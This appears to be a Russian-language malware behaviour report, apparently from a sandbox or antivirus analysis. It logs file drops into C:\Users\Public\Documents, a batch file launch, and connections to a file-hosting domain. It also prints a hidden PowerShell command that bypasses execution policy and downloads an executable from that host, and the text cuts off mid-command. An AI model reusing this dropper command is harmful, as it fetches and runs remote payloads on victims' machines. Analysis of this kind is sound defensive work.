Техническая информация
- https://a.pomf.cat/msedqf.exe как c:\users\public\documents\dfshjhdxzwdfsn.exe
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\sadjJHdsf.bat" "
- C:\users\public\documents\sadjjhdsf.bat
- 'a.##mf.cat':443
- 'a.##mf.cat':443
- DNS ASK a.##mf.cat
- '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\Documents\sadjJHdsf.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.pomf.cat/msedqf.exe','C:\Users\Public\Documents\DFSHJhdxzwdfsn.exe...